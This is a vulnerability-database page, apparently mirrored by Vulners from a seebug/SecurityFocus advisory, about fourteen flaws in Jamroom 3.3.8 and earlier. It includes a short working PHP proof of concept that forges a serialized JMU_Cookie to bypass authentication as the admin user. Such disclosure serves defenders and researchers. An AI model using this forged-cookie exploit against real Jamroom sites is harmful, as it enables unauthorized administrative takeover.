Lucene search
K

Jamroom <= 3.3.8 Cookie Authentication Bypass Vulnerability and Multiple Unspecified Security Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 7 Views

Jamroom 3.3.8 Cookie Authentication Bypass & Other Security Vulnerabilitie

Code

                                                source: http://www.securityfocus.com/bid/30406/info

Jamroom is prone to fourteen security vulnerabilities, including an authentication-bypass vulnerability that occurs because the application fails to verify user-supplied data.

Very few technical details are available regarding the remaining security vulnerabilities. We will update this BID when more information is disclosed.

An attacker can exploit the authentication-bypass vulnerability to gain administrative access to the affected application; other attacks are also possible. Effects of the remaining security vulnerabilities are not currently known. 

&#60;?php
$data = array();
$user = &#39;admin&#39;; // Target

$data[0] = base64_encode(serialize($user));
$data[1] = (bool)0;
echo &#34;\n\n===[ 0 ] ========================\n\n&#34;;
echo &#39;Cookie: JMU_Cookie=&#39; . urlencode(serialize($data));
$data[1] = (bool)1;
echo &#34;\n\n===[ 1 ] ========================\n\n&#34;;
echo &#39;Cookie: JMU_Cookie=&#39; . urlencode(serialize($data));
?&#62;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation